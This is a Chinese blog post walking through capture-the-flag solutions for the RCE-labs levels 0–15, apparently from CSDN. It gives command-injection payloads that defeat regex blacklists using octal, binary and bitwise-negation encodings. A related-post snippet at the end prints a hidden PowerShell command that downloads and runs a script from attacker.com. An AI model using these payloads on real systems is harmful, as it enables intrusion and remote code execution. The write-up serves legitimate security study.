4.19学习——RCE-labs刷题

于 2025-04-19 22:28:36 发布
阅读量678 收藏 9
点赞数 7
CC 4.0 BY-SA版权
文章标签: 学习 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88422349/article/details/147256522

Level 0

这个题是告诉了RCE是什么,介绍了一下RCE在这里插入图片描述

Level 1

在这里插入图片描述这道题目的核心代码是这一部分,通过eval()函数将传入的a的参数作为代码执行在这里插入图片描述在这里插入图片描述

Level 2

这道题目上来就要抽函数
在这里插入图片描述
同时定义了全局变量flag,get传参输入action=r和action=submit来进行选择函数,我这里选中了assert函数;assert() 用于调试,检查表达式是否为 true。若表达式为字符串,会将其​​当作 PHP 代码执行​​(类似 eval())。所以这个函数其实可以当做eval来使用

在这里插入图片描述接下来构造payload,因为这个函数跟eval类似,会将输入的内容作为代码执行,由于前面提到$ flag是全局变量,构造:

//post
content='print_r($flag)'

直接读取flag
在这里插入图片描述

Level 3

这题的核心代码是:

system($_POST['a']);
highlight_file(__FILE__);

貌似跟第一题很像,但是这里是用system函数,把传入的参数作为system函数的参数执行在这里插入图片描述接下来就是读取flag了

Level 4

这题的核心代码:

function hello_server($ip){
    system("ping -c 1 $ip");
}
isset($_GET['ip']) ? hello_server($_GET['ip']) : null;
highlight_file(__FILE__);

这题考察的是shell运算符和通配符,通过ping一个地址来执行命令在这里插入图片描述此时是正常执行ping的命令,接下来可以在这个ping的IP后面用连接符连接上要执行的命令在这里插入图片描述后面一样的读取flag就行了

Level 5

这一题开始出现黑名单的概念

function hello_shell($cmd){
    if(preg_match("/flag/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);

但是这里只过滤了flag,有非常多的方法,最简单的就是用/和\分隔就行了,也可以参考题目中提到的用*,[],{}去触发匹配

Level 6

这题的黑名单最开始看见以为是无字母的rce

function hello_shell($cmd){
    if(preg_match("/[b-zA-Z_@#%^&*:{}\-\+<>\"|`;\[\]]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);

结果发现小写的a没有过滤,但是黑名单太多了,根据经验,一般flag都是放在根目录下尝试构造
?cmd=*a * /**a *,但是回显显示匹配到了黑名单,我就有点懵逼,后面去看了一下wp,发现可以使用base64来输出,这里加上数字匹配也是只有base64,因为一般情况下flag在根目录下,所以构造payload在这里插入图片描述
base64加密开就是flag在这里插入图片描述

Level 7

这关就是简单的空格绕过
空格可以用下面的符号来绕过

<,<>,${IFS},$IFS%20(space),%09(tab),$IFS$9,$IFS$1

在这里插入图片描述在这里插入图片描述

Level 8

根据题目提示这个是一个无回显的RCE,而且题目中也告诉了无回显的原理在这里插入图片描述这里解释一下stdout和stderr,stdout是正常输出文件描述符1,比如我们执行的命令结果,stderr是报错输出文件描述符2,就是一些运行的错误信息,所以为什么加上2>&1就无法回显报错信息,因为将报错信息重定向到·正常输出中,然后又定向到空设备丢弃,就形成了无回显,这里可以使用;将后面的重定向给截断,这里需要了解一个问题>重定向符号需要联合其它命令来一起使用;这里加上;相当于cat /flag;>dev/null后面的>dev/null就相当于是执行一个空命令然后输入到/dev/null里
payload:

cat /flag;

Level 9

题目:

function hello_shell($cmd){
    if(preg_match("/[A-Za-z\"%*+,-.\/:;=>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);
?>

发现是无字母的类型,然后过滤了一堆字符,发现$没被过滤,根据题目提示,这题用8进制转义,可以用:

$''

来进行8进制转义,同时题目也提示8进制不能执行带空格的参数命令
,如果要执行这样的命令需要再用上面的格式进行分割;比如"ls -l"也就是$'\154\163\40\55\154' 只能拆分为$'\154\163' 空格 $'\55\154'三部分
payload:

?cmd=$'\143\141\164' $'\57\146\154\141\147'

在这里插入图片描述

Level 10

题目:

function hello_shell($cmd){
    if(preg_match("/[A-Za-z2-9\"%*+,-.\/:;=>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);
?>

考点为终端中支持 $((2#binary)) 解析二进制数据。
ls的payload:

$0<<<\$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'

cat /flag

%240%3c%3c%3c%240%5c%3c%5c%3c%5c%3c%5c%24%5c%27%5c%5c%24((%24((1%3c%3c1))%2310001111))%5c%5c%24((%24((1%3c%3c1))%2310001101))%5c%5c%24((%24((1%3c%3c1))%2310100100))%5c%5c%24((%24((1%3c%3c1))%23101000))%5c%5c%24((%24((1%3c%3c1))%23111001))%5c%5c%24((%24((1%3c%3c1))%2310010010))%5c%5c%24((%24((1%3c%3c1))%2310011010))%5c%5c%24((%24((1%3c%3c1))%2310001101))%5c%5c%24((%24((1%3c%3c1))%2310010011))%5c%27

在这里插入图片描述

Level 11

题目代码:

function hello_shell($cmd){
    if(preg_match("/[A-Za-z1-9\"%*+,-.\/:;=>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_POST['cmd']) ? hello_shell($_POST['cmd']) : null;

highlight_file(__FILE__);

这题跟上面差不多,只是过滤了1,题目中提供了个脚本可以一把梭,这里的1可以用{##}进行绕过
ls /的payload:

$0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}0${##}000${##}${##}))\\$(($((${##}<<${##}))#${##}0${##}000))\\$(($((${##}<<${##}))#${##}${##}${##}00${##}))\'

在这里插入图片描述
接下来跟上面的一样直接cat
在这里插入图片描述

Level 12

在这里插入图片描述

${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\'

根据脚本生成的ls /
直接cat

${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${##}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${##}${#}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}))\\$(($((${##}<<${##}))#${##}${##}${##}${#}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${#}${#}${##}${##}${#}${##}))\\$(($((${##}<<${##}))#${##}${#}${#}${##}${#}${#}${##}${##}))\'

在这里插入图片描述

level 13

题目:

function hello_shell($cmd){
    if(preg_match("/[A-Za-z0-9\"%*+,-.\/:;>?@[\]^`|]/", $cmd)){
        die("WAF!");
    }
    system($cmd);
}

isset($_GET['cmd']) ? hello_shell($_GET['cmd']) : null;

highlight_file(__FILE__);

?>

题目提示这关的考点,用$(())取反绕过
在这里插入图片描述这里是用了补码取反的原理
cat的payload

__=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'

得到flag
在这里插入图片描述

Level 14

这关7字符RCE,进去就提示太长了
在这里插入图片描述
一直没看见哪里有题目参数,后面去看了wp才知道get参数有个1在这里插入图片描述
可以用:

cat /f*

来匹配flag

Level 15

这题是5字符的RCE

$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
    @exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
    @exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);

?>

定义了一个sandbox变量是/www/sandbox/拼接上md5加密(orange加用户ip),然后根据上面的用户ip那一串创建一个文件夹,然后进去这个文件夹,上传一个参数cmd限制长度为5,然后使用exec函数执行这个命令,但是我们知道exec这个函数执行是相当于没有回显的只会回显最后一行,而如果传参数reset就删除文件夹
这里使用>重定向符号来解决
把ls指令,cat指令,/f*分别传入再执行

醉暮天
关注
CTFhub RCE靶场
qq_64703089的博客
08-06 667
通过管道符,可以将一个命令的标准输出管理为另外一个命令的标准输入,当它失败后,会执行另外一条命令。修改发送方法为post,目标修改为/?观察phpinfo得出需要用php://input。发现 flag_8051660913375.php。遂构造php://input发现行不通,所以用php://filter。发现有个php文件,cat一下。发现 flag_is_here。
RCE以及Upload -lab的小心得
qq_42739469的博客
11-05 269
为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。
RCE-labs 项目使用教程
最新发布
gitblog_00065的博客
04-14 732
RCE-labs 项目使用教程 1. 项目目录结构及介绍 RCE-labs 项目目录结构如下: RCE-labs/ ├── build.bat ├── build.sh ├── LICENSE ├── README.md ├── .gitignore ├── Level_0/ │ ├── ... │ └── ... ├── Level_1/ │ ├── ... │ └── ... ...
[Hello-CTF]RCE-Labs超详细WP-Level 5
qq_39673370的博客
03-09 860
WAF绕过初试
[Hello-CTF]RCE-Labs超详细WP-Level13&Level14(PHP下的0/1构造RCE命令&简单的字数限制RCE)
qq_39673370的博客
03-13 953
PHP下的0/1构造RCE命令&简单的字数限制RCE
[Hello-CTF]RCE-Labs超详细WP-Level 0&1
qq_39673370的博客
03-08 768
RCE-Labs超详细WP-Level 0&1
[Hello-CTF]RCE-Labs超详细WP-Level7&Level8
qq_39673370的博客
03-10 897
绕过空格与输出重定向
HelloCTF [RCE-labs] Level 0 - 代码执行&命令执行
weixin_73049307的博客
10-28 612
任意代码执行(Arbitrary Code Execution,ACE)」 是指攻击者在目标计算机或目标进程中运行攻击者选择的任何命令或代码的能力,这是一个广泛的概念,它涵盖了任何类型的代码运行过程,不仅包括系统层面的脚本或程序,也包括应用程序内部的函数或方法调用。这些命令最终的指向通常是系统命令,如Windows中的CMD命令或Linux中的Shell命令,这在语言中可以体现为一些特定的函数或者方法调用,如PHP中的shell_exec()函数或Python中的os.system()函数。
网络安全CTF靶场之rce-labs
01-02
在网络安全CTF靶场之rce-labs的背景下,“RCE”指的是远程代码执行(Remote Code Execution),这是一种安全漏洞,攻击者可以利用该漏洞在远程服务器上执行任意代码。这种漏洞通常出现在Web应用程序中,攻击者可能...
[Hello-CTF]RCE-Labs超详细WP-Level10(无字母命令执行_二进制整数替换)
qq_39673370的博客
03-12 1260
无字母命令执行_二进制整数替换
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
Web安全实践靶场系统-RCE
weixin_54704073的博客
05-22 1564
且file7.php返回了报错,通过这个报错,可以知道fi_local.php中用来进行文件包含的函数是include(),并且包含的文件路径为与fi_local.php同文件夹下include文件夹中的文件。开始去查找警告存在的问,从警告中可以看到说是 php.ini 文件中的allow_url_include 没有打开,找到警告中说的文件php.ini。修改完之后,将小皮的套件重启。尝试写入一句话木马,格式为txt文本,前面讲到不能包含同后缀的文件,是把其他类型的文件当成 php 解析。
HelloCTF [RCE-labs] Level 8 - 文件描述和重定向
weixin_73049307的博客
10-29 862
使用base64命令将/flag的内容编码成Base64格式,然后通过管道输出。这行代码将执行命令 $cmd,并且将其标准输出和标准错误输出都重定向到 /dev/null,这意味着无论命令的输出还是可能产生的错误信息都不会显示出来。2>&1 是另一个重定向操作,它把标准错误输出复制到之前的标准输出位置(即 /dev/null),这样标准错误也不会出现在屏幕上。> /dev/null 是一个输出重定向,它把标准输出重定向到 /dev/null,这样就不会有输出出现在屏幕上。一样成功得到flag。
HelloCTF [RCE-labs] Level 6 - 通配符匹配绕过
weixin_73049307的博客
10-28 396
使用 /bin/base64 /flag。可以尝试在Linux终端中做下面的几个实验,使用echo方法输出?#使用 /bin/cat /flag。b-zA-Z 过滤b到Z范围内的任何单个字符。:{}\-\+<>\"| 匹配这些符号之一。(这里我重开了靶场,所以flag不一样)\[\] 匹配这些符号之一。也一样能拿到flag。
HelloCTF [RCE-labs] Level 3 - 命令执行
weixin_73049307的博客
10-28 295
这关代码跟level 1的区别是eval($_POST['a']);变成了system($_POST['a']);system() 函数会通过软连接执行你输入的系统命令。POST传参:a=cat /flag。
HelloCTF [RCE-labs] Level 7 - 空格过滤
weixin_73049307的博客
10-29 315
空格则选择< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS之一进行替代即可。(不知道为什么这%20(space)、%09(tab)不可以替代空格)由level 5得知flag可以用fl$*ag进行替代。GET传参cmd,对flag字符串和空格进行了过滤。
pikachu
m0_74871683的博客
10-17 852
首先,随便选一个球星,观察到url是可见其中包含了一个文件file1.php,猜测这里其他文件名可能也是个filex.php(x是数字)的格式把5个NBA球星都选一遍,发现文件名确实是file1.php~file5.php用burp爆破,send to intruder爆破位置设置为文件名中的数字,payload设置为Numbers,从6到100,步长为1,点start attack开始爆破。
PHP 代码执行相关函数
weixin_73049307的博客
10-28 455
过滤数组元素,如果提供回调函数,仅包含回调返回真值的元素;没有返回值,除非在执行的代码中明确返回。迭代一个数组,通过回调函数将数组的元素逐一减少到单一值。接受数组、回调函数和可选的初始值。用于调用回调函数,可以传递多个参数给回调函数,返回回调函数的返回值。对数组进行自定义排序,接受数组和比较函数作为参数。创建匿名函数,接受两个字符串参数:参数列表和函数体。返回一个匿名函数的引用。将回调函数应用于数组的每个元素,返回一个新数组。调用回调函数,并将参数作为数组传递。或其他动态执行代码的功能,用于间接执行代码。
[Hello-CTF]RCE-Labs超详细WP-Level 6
qq_39673370的博客
03-09 737
通配符的限制
[RCE-labs] Level 3
01-19
### RCE-Labs Level 3 概述 RCE-Labs 是一系列针对 SQL 注入漏洞利用的教学平台,旨在帮助安全研究人员理解和掌握如何通过SQL注入实现远程代码执行 (Remote Code Execution, RCE)[^1]。Level 3 特别关注于绕过某些防护机制并最终获得服务器控制权。 ### 技术细节与挑战 在这一级别中,目标应用程序启用了 `Ole Automation Procedures` 功能: ```sql EXEC sp_configure 'Ole Automation Procedures',1; RECONFIGURE; ``` 这允许攻击者创建 COM 对象来调用外部程序或脚本引擎,从而可能引发任意命令执行的风险。然而,在实际环境中此功能通常被禁用以增强安全性。 ### 利用方法分析 为了成功完成该级别的挑战,可以考虑以下技术路径之一: #### 方法一:使用 WScript.Shell 执行系统指令 当 `Ole Automation Procedures` 被启用时,可以通过如下方式实例化 Windows Script Host 的 Shell 对象,并运行 calc.exe 来验证是否能够触发计算器应用作为测试案例: ```sql DECLARE @o int; EXEC sp_OACreate 'WScript.Shell',@o OUT; EXEC sp_OAMethod @o,'Run',NULL,'calc.exe'; ``` 这种方法展示了基本原理,但在真实场景下还需要进一步处理返回数据以及隐藏进程启动等问。 #### 方法二:借助 PowerShell 提升权限 另一种更隐蔽且强大的手段是利用PowerShell来进行更为复杂的操作,比如下载恶意软件到本地磁盘然后加载执行等动作。不过需要注意的是这种方式可能会受到更多监控工具的关注而容易暴露行为特征。 ```sql DECLARE @cmd nvarchar(4000); SET @cmd='powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://attacker.com/malicious.ps1'')"'; EXEC xp_cmdshell @cmd; ``` 上述两种途径均需谨慎对待,仅限合法授权下的渗透测试活动中采用;任何非法入侵他人计算机信息系统的行为都是违法的!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值